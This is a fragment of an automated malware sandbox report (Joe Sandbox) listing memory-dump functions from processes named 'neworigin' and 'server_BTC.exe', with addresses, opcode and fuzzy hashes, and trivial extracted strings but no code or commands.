Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a722c0466f1ea9f1ee657ec2ac5ccd613b73a7b1fddfe34286d7d887eac9d05f
Instruction ID: 32bc39ccdde49fd4b27e6c9f3aad11d570ef7e234846e412f12312e6f1860ffc
Opcode Fuzzy Hash: a722c0466f1ea9f1ee657ec2ac5ccd613b73a7b1fddfe34286d7d887eac9d05f
Instruction Fuzzy Hash: 70813B71B006098FDF54EFA8D4A079EBBF2EB89300F208529D50AEB355DB35DC428B51

Function 06A946D8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0f490302e8b178d2aceff77d428b61bbeb7f50c3e72da9bf49712ad8fc5ae2
Instruction ID: 4ef5adf477a72bcb825645292b1891e54c626b44bbbb4b3ad2747776a5b20419
Opcode Fuzzy Hash: ac0f490302e8b178d2aceff77d428b61bbeb7f50c3e72da9bf49712ad8fc5ae2
Instruction Fuzzy Hash: 59913030E106198FDF60DF68C89079DB7B1FF8A300F208695D549AB255DB70AA86CF91

Function 06A946F0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd37398d7a44b315a8f8fca336ee110a797071fe78f119b7b522128b6e3b986
Instruction ID: 4c269adf1192eee393f7984b30078c3ad0499fd091db2d27ed5fb736746ada35
Opcode Fuzzy Hash: ebd37398d7a44b315a8f8fca336ee110a797071fe78f119b7b522128b6e3b986
Instruction Fuzzy Hash: B0912D30E106198BDF64DF68C890B9DB7B1FF89310F208699D549BB354DB71AA86CF90

Function 06A9EC38 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d71fae7fe6da40ceb760f63291583c30011fa32d1997ff2d5b36fd7fe620586a
Instruction ID: 976c84327c563094136e867478d82320b443ced45c28facc33b189f04d83f448
Opcode Fuzzy Hash: d71fae7fe6da40ceb760f63291583c30011fa32d1997ff2d5b36fd7fe620586a
Instruction Fuzzy Hash: 7B715C30A002099FDF54EFA9D990AADBBF6FF89300F258529D055AB355DB34EC46CB60

Function 06A9EC48 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc5b1a0618a03fbc56e4472847e710759725c9ceaa24f3235b35b5d1a25812b8
Instruction ID: 13df41bf4e87919aa669fb29ae1ca12702b8b8e9bce3680ccca5e4e665528134
Opcode Fuzzy Hash: dc5b1a0618a03fbc56e4472847e710759725c9ceaa24f3235b35b5d1a25812b8
Instruction Fuzzy Hash: B2714C30A002099FDB54EFA9C990A9EBBF6FF89300F248529D045EB355DB30EC46CB60

Function 06A9FB58 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3021e782508ba5db3b3f835b3324a077fb696c4c48a6925e1b4dcd649dac60d3
Instruction ID: 38bf8a0fd808752a67dc37a1df33a8d836d835b77a68d92a3feea49d578210ce
Opcode Fuzzy Hash: 3021e782508ba5db3b3f835b3324a077fb696c4c48a6925e1b4dcd649dac60d3
Instruction Fuzzy Hash: DE51A374B102049FFF647FA8D86476F36ABE78A710F30442AE44ADB795CA79CC4147A2

Function 06A9FB68 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0713cac7217cb8775a934dfbf7291b1b4dc2525ed463649ea0e79e11210b9e3
Instruction ID: c7d955b21d6bf141392ab6949246134b28d5a87a9279b9ae424a089d4d5b73fc
Opcode Fuzzy Hash: c0713cac7217cb8775a934dfbf7291b1b4dc2525ed463649ea0e79e11210b9e3
Instruction Fuzzy Hash: 2451A574B102049FFF647FA8D86472F36DAE78A750F30442AE50ACB795CA78CC4147A2

Function 06A95531 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8289b317554bda1fc560333c831af3749c25366255e8eb5e4ba824abcc0cd1b
Instruction ID: fa06999f05adeb28f7a2af36f9edb540d155695ba28af730bf9e5f4456e33e41
Opcode Fuzzy Hash: b8289b317554bda1fc560333c831af3749c25366255e8eb5e4ba824abcc0cd1b
Instruction Fuzzy Hash: 51417F71E006098FDF61DF99D881AAFF7F6EB44310F24492AE216D7251D230E855CBA1

Function 06A92088 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a66d7a8c6676ddb5b4ea40f6a94bf5c59dde2d9072b557c0c4591e0827fc178e
Instruction ID: 5076862e5aa32aaff6a71b34e89a8be95d55497eb43891c9dc01268c68311942
Opcode Fuzzy Hash: a66d7a8c6676ddb5b4ea40f6a94bf5c59dde2d9072b557c0c4591e0827fc178e
Instruction Fuzzy Hash: 29318030E102059BDF55EF64D89479EB7F2EF89300F208519E906EB354DB71AE46CB60

Function 06A92098 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2778bd8a22ae8b439368d500ebc6c4e00c64097c9aeab1fde2883e933646f256
Instruction ID: 7b39e980b49607509cc85a3a3e70655be3f807542698277167865bc815a50633
Opcode Fuzzy Hash: 2778bd8a22ae8b439368d500ebc6c4e00c64097c9aeab1fde2883e933646f256
Instruction Fuzzy Hash: 19315030E102059BDF55EFA4D89479EB7F6BF89300F208529E906EB354DB71AD46CB60

Function 06A93BB9 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edee3b899732751aa7c807db098ede4d2ec64af2c640000764a8b25cb14e705e
Instruction ID: 467f41b5bee2a9ce859744625ec09b083265206c6683b98200937dcce8866681
Opcode Fuzzy Hash: edee3b899732751aa7c807db098ede4d2ec64af2c640000764a8b25cb14e705e
Instruction Fuzzy Hash: EC217C75E01A189FDF50DF68D980AEEBBF5BB48310F204029E905EB354EB31D945CBA0

Function 06A93BC8 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929f62d5c06bfcd9363d3955fa2e647a31520ac3afe41b5b20ed3b314a8c653d
Instruction ID: b5a426c357a01a77ad497a00e8166bbe8d6acb2c4132a8d3bb08b523a364bbaa
Opcode Fuzzy Hash: 929f62d5c06bfcd9363d3955fa2e647a31520ac3afe41b5b20ed3b314a8c653d
Instruction Fuzzy Hash: 6C214F75E00A199FDF50DF69D990AAEBBF5BB48310F104029E905EB354EB31D940CBA0

Function 06A93CD8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a3d93f6b6418abd29aded6408f560d6f468dff4d80f67c05be78fc0b164dfd
Instruction ID: f52e0fc45c236698d07e8ee75a6ae38c10ce4d3e634271a23311fa731e1fbdc6
Opcode Fuzzy Hash: 82a3d93f6b6418abd29aded6408f560d6f468dff4d80f67c05be78fc0b164dfd
Instruction Fuzzy Hash: 74118E32B006289FDF94A66DC8646AE77F6EBC8311B104539D806EB348DE65DC068BE0

Function 06A9431A Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d723b4768c599b40ce7a9ba7cf2d634b562ff0add2e51b53b777effb85d2c616
Instruction ID: 7c1e05cb09064e7f3fec2e9cd532abf37aadf32f4f7cbf31643f9c9aeabf13a4
Opcode Fuzzy Hash: d723b4768c599b40ce7a9ba7cf2d634b562ff0add2e51b53b777effb85d2c616
Instruction Fuzzy Hash: 03019A31B201101BEB65AB7CA854B2FB7EADBCA310F24892EE50ACB355D965DC0343A1

Function 06A93990 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2caee75c8e5a16b81ff6f709d2a421e4f8fb143a5d8ced95567fb6e7386c2aeb
Instruction ID: b0745d7beb3b4c7ba1cea44e4e6627d799647afb415c1e4763c7f9536757d80e
Opcode Fuzzy Hash: 2caee75c8e5a16b81ff6f709d2a421e4f8fb143a5d8ced95567fb6e7386c2aeb
Instruction Fuzzy Hash: E12103B5D01259AFCB10DF9AD884BCEFBF8FB48310F10812AE918A7200C375A554CFA5

Function 06A9EEB9 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cfd6052633ac054e4fe0a42d95fd108e81372120540e7d3a703d07a0494e768
Instruction ID: f69dab2ed007480deb2f0dc7342febfd5b27a9da16b54148c125446465caa4a1
Opcode Fuzzy Hash: 0cfd6052633ac054e4fe0a42d95fd108e81372120540e7d3a703d07a0494e768
Instruction Fuzzy Hash: 0201B135B000104BDF65EBACA450B6E67E6EF8A714F24893AE10ACB342DA25CC0243A1

Function 06A93998 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77398c62171c39bbec3412224c1262f1fd74d5b1a3290cfe37523d6789b2a8c1
Instruction ID: 27b5d0beeb427cf1d86fc00698d5ac6c95db43316a1e8c5f1143a511f45efc23
Opcode Fuzzy Hash: 77398c62171c39bbec3412224c1262f1fd74d5b1a3290cfe37523d6789b2a8c1
Instruction Fuzzy Hash: E511D0B5D01259AFCB10DF9AD884BDEFBF8FB48310F10812AE918A7210C375A944CFA5

Function 06A94328 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c1778e0ba6e34f9584729f8201a280d8d1d50493144fa288963f257708390e1
Instruction ID: 92b34ca64822079e06dfd3d468791ef09840d46b9303ebbd06f936ae3aa063b1
Opcode Fuzzy Hash: 3c1778e0ba6e34f9584729f8201a280d8d1d50493144fa288963f257708390e1
Instruction Fuzzy Hash: 2B018B71B101200BDB64A67D9450B2FF2EADBCD710F20883AE10ACB354DD65DC0343A1

Function 06A9A409 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c89c64e94e9e8b9107bb2e09989cd251f0ce3d65afe3a33ab2bb0bfbbafd382
Instruction ID: 186b6b0c09f962e6c752d211d37f4ff190a9408ddd6ababfc1b239fce4afe2d5
Opcode Fuzzy Hash: 8c89c64e94e9e8b9107bb2e09989cd251f0ce3d65afe3a33ab2bb0bfbbafd382
Instruction Fuzzy Hash: A3017571B005104FDBA1EB7CE594B6A77E2EBC9710F208829E50ACB355DE25DC068B95

Function 06A93CC7 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df3c694e9c23e980cae4f4a1b34779511caef07c53be55510b8ec505c7102e9c
Instruction ID: ebeabea5e623e18b8ae042cf3cf66d000f05a6c7665cae6231e3b6e87bfe3048
Opcode Fuzzy Hash: df3c694e9c23e980cae4f4a1b34779511caef07c53be55510b8ec505c7102e9c
Instruction Fuzzy Hash: 3001B132B005649FDF95E66DD8646EF3BE79BC9300F14013AD905DB348DE608C0687E0

Function 06A9EEC8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c82d3341ca506dd0d6f208b5adf304f69e21b40ae4c1368e71de7014629e27bb
Instruction ID: b838183036d19b2e4c3f09f3fc44d7ebeb0ea600daaf80ef4a2933f25e3651e1
Opcode Fuzzy Hash: c82d3341ca506dd0d6f208b5adf304f69e21b40ae4c1368e71de7014629e27bb
Instruction Fuzzy Hash: 01018131B101201BDF65E7ADA450B6F63DAEFC9714F24883EE10ACB341DE65DC4243A1

Function 06A9A418 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57593fa6c7ec632f49f89d3fffbbe2491e0b520d14aadd12228ddfeec5ae6a9
Instruction ID: 689acf4791a4118aca9dee11c094b98c0c0ff83e2ed0a21bd089b704edce4c3b
Opcode Fuzzy Hash: d57593fa6c7ec632f49f89d3fffbbe2491e0b520d14aadd12228ddfeec5ae6a9
Instruction Fuzzy Hash: 54018171B005140FDFA1EB6CE454B2A73E6EBC9720F208C3AE20ACB355DE25DC428B91

Function 06A9C8F0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 925ebf4ebec0839ae9deb1c4a8bc14b92bd83b95dff0ad18517efe41e3c9ab0b
Instruction ID: e43102730db3f109dbf47bc22082d57e56ab261ea9e74d703eeb47b6f34850bc
Opcode Fuzzy Hash: 925ebf4ebec0839ae9deb1c4a8bc14b92bd83b95dff0ad18517efe41e3c9ab0b
Instruction Fuzzy Hash: 1EF0EC33F20228ABDF24AA69DC1099AB37AE784364F104435ED01E7344D7316C00C7D0

Function 06A96569 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7b344c9d80334d8020ffb6537d2e80fe261b834ac0fb1e01c11b23734ba64d
Instruction ID: a5ca49ea468cca9d50ca8e21a96d58cd5d2d6e7709e917ece495459d3d88ea1d
Opcode Fuzzy Hash: 0f7b344c9d80334d8020ffb6537d2e80fe261b834ac0fb1e01c11b23734ba64d
Instruction Fuzzy Hash: 28E09A71E15208ABEF50EFB4C90978A7BFDDB06208FA048A5E404CF242E576ED0287A1

Non-executed Functions

Function 06A97798 Relevance: 13.0, Strings: 10, Instructions: 468COMMON

Download Yara Rule

Strings

$q, xrefs: 06A97D2F
$q, xrefs: 06A978BD
$q, xrefs: 06A97D19
$q, xrefs: 06A978EE
$q, xrefs: 06A978B1
$q, xrefs: 06A978E2
$q, xrefs: 06A97C7A
$q, xrefs: 06A97C6E
$q, xrefs: 06A97D23
$q, xrefs: 06A97D0D

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-1298971921
Opcode ID: 63eb638057e40edb9ca21646b1f79689a374e2c96f65f5b4397f5eaab913f806
Instruction ID: b15a1459509582d73446c8e465e636f54ee25c9582f1cec0e0ba6b9ebd0f6254
Opcode Fuzzy Hash: 63eb638057e40edb9ca21646b1f79689a374e2c96f65f5b4397f5eaab913f806
Instruction Fuzzy Hash: FC121871A106198FDF68EB65C854BADB7F2BF89301F2485A9D406AB354DB30DD81CFA0

Function 06A9AA38 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$q, xrefs: 06A9AB2E
$q, xrefs: 06A9ABEA
$q, xrefs: 06A9AB89
$q, xrefs: 06A9AB95
$q, xrefs: 06A9ABC0
$q, xrefs: 06A9ABF6
$q, xrefs: 06A9ABB4
$q, xrefs: 06A9AB3A

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: ba603ea2e59a8afaef7ae0c2c5ef84dc9d4bf4e1d2e270a942163b41b28fa86f
Instruction ID: 7cef319d85f1687bd2d659355a401683504c541bf2598e16f4cf8824ee551f56
Opcode Fuzzy Hash: ba603ea2e59a8afaef7ae0c2c5ef84dc9d4bf4e1d2e270a942163b41b28fa86f
Instruction Fuzzy Hash: 09917230A00209DFEF68EF65D554BAE77F2BF84301F24852AE5429B354DB749C41CBA0

Function 06A97198 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$q, xrefs: 06A97634
$q, xrefs: 06A9747A
$q, xrefs: 06A974D4
$q, xrefs: 06A976AC
$q, xrefs: 06A974E0
$q, xrefs: 06A976A0

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: acc18dc9457ee160839bd948626d64443d12d7bb3902c1b5b4c953f1fc2ee1cb
Instruction ID: 3d80b846026a52bc05fa231479aab170f3ab9f313406d5583265ded44974e2b3
Opcode Fuzzy Hash: acc18dc9457ee160839bd948626d64443d12d7bb3902c1b5b4c953f1fc2ee1cb
Instruction Fuzzy Hash: 34F13A34A10209CFDB58EF64D594B6EB7F2BF84300F648569D4469B358DB75EC82CBA0

Function 06A984D0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$q, xrefs: 06A9872A
$q, xrefs: 06A98736
$q, xrefs: 06A9878F
$q, xrefs: 06A9879B

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: e5e84ffdb48b160478ce81f7b171ae3ea41699bab544941f14f66802b3710a14
Instruction ID: 8fc55e8ee0a562b3658888567f8eaa1821c5b2924540457b0b493b10d0b7e20b
Opcode Fuzzy Hash: e5e84ffdb48b160478ce81f7b171ae3ea41699bab544941f14f66802b3710a14
Instruction Fuzzy Hash: BCB12D70A102198FDF58EB65D5907AEB7F2BF85300F648929D0069B358DB79DC86CBA0

Function 06A988E8 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$q, xrefs: 06A98973
LRq, xrefs: 06A98A2A
$q, xrefs: 06A98967
LRq, xrefs: 06A989DB

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: LRq$LRq$$q$$q
API String ID: 0-2204215535
Opcode ID: 9ea9fe9b65ca38c02dd74be78eb6a85ef6af71ee72fa74cf95f61513cda24489
Instruction ID: 4e19ad6343413235e57e99364ef60225de1285baea77af22504c6c0169fba86d
Opcode Fuzzy Hash: 9ea9fe9b65ca38c02dd74be78eb6a85ef6af71ee72fa74cf95f61513cda24489
Instruction Fuzzy Hash: 6651B531B002058FDF58EB68D550B6A77F2BF4A300F248969E4429F399DB75EC40CB65

Function 06A9ADC2 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

$q, xrefs: 06A9AF44
$q, xrefs: 06A9AEF1
$q, xrefs: 06A9AF73
$q, xrefs: 06A9AF9C

Memory Dump Source

Source File: 0000000D.00000002.1731337027.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6a90000_neworigin.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q
API String ID: 0-4102054182
Opcode ID: 0030a73f8738fce6b48e44986b92656d2fbd3e3e7a39bf2052444c8a3265ac41
Instruction ID: 91d34f2224582141e27d5e930d6ed195cdd93fb2a4bdff3c88d1d8a6a9301ba8
Opcode Fuzzy Hash: 0030a73f8738fce6b48e44986b92656d2fbd3e3e7a39bf2052444c8a3265ac41
Instruction Fuzzy Hash: 6D519171E102158FDF64EB68D590AAEB3F2EF89304F24852AE506DB344DB34DC81CBA1

Analysis Process: server_BTC.exePID: 5868, Parent PID: 3192COMMON

Executed Functions

Function 00987108 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53bf5483379535879d051da2515dc7fff688dcefe0fcd3c9247c4ae027841f22
Instruction ID: 139bae7354e83dbde187977f2443a3d327670ad6cc7be9d0afc4c5cca82e3367
Opcode Fuzzy Hash: 53bf5483379535879d051da2515dc7fff688dcefe0fcd3c9247c4ae027841f22
Instruction Fuzzy Hash: CE61E574A00248CFCB44DFA9D994A9CBBF1FF89310F1580AAE806AB365DB30AC45CF14

Function 0098767A Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67058a9f67132da7418596e90563bb1922eb41994bb8e2d8adcf3261dd1a73fb
Instruction ID: 3fe1fc787e427efd777f669f27fa359e52f0f0910c62e31adab7f2a380ad7f6d
Opcode Fuzzy Hash: 67058a9f67132da7418596e90563bb1922eb41994bb8e2d8adcf3261dd1a73fb
Instruction Fuzzy Hash: 8E71E174D00219CFDB15EFA4D895AADBBB2FF89300F608569D405AB364DB35AD8ACF40

Function 00987FBC Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b8943891d645f0a01f7c12e3ee964bdc899f0ffb8ddb3790a4bcf5c73d51320
Instruction ID: e2ba26c34ef35c61267247206381f7e8c843f406fd0ad11f077fb602bb144ead
Opcode Fuzzy Hash: 6b8943891d645f0a01f7c12e3ee964bdc899f0ffb8ddb3790a4bcf5c73d51320
Instruction Fuzzy Hash: 1F61EF74D052489FDB14EFE9D984BEEFBB5AF48300F24802AE415AB350CB759946CF50

Function 00987E5F Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6fd26074bf77e881763c623a88f5ae52fd361ca76af30990b4a7860c8e208d0
Instruction ID: e50a544df09f4133298d9c6a4e882a020e4286a8169b550558b4300216a7613b
Opcode Fuzzy Hash: b6fd26074bf77e881763c623a88f5ae52fd361ca76af30990b4a7860c8e208d0
Instruction Fuzzy Hash: 1541CAB0D042489FDB14DFEAC884ADEFBB6AF48300F24802AE519AB254D7349986CF54

Function 00987E60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_980000_server_BTC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcbd5a6d2db10bd04676b84d52d5647140191b1ff9a01b419262731451d1464a
Instruction ID: 52a1fe4345c93782a478cd738b5e991545ae59f8c7e037f14138ba84a3b9d9e7
Opcode Fuzzy Hash: bcbd5a6d2db10bd04676b84d52d5647140191b1ff9a01b419262731451d1464a
Instruction Fuzzy Hash: 2E41CBB0D042489FDB14DFEAC884ADEFBF6AF48300F24802AE519AB254D7349986CF54

Function 009874F2 Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

Jq, xrefs: 00987611

Memory Dump Source

Source File: 0000000E.00000002.1523540148.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false

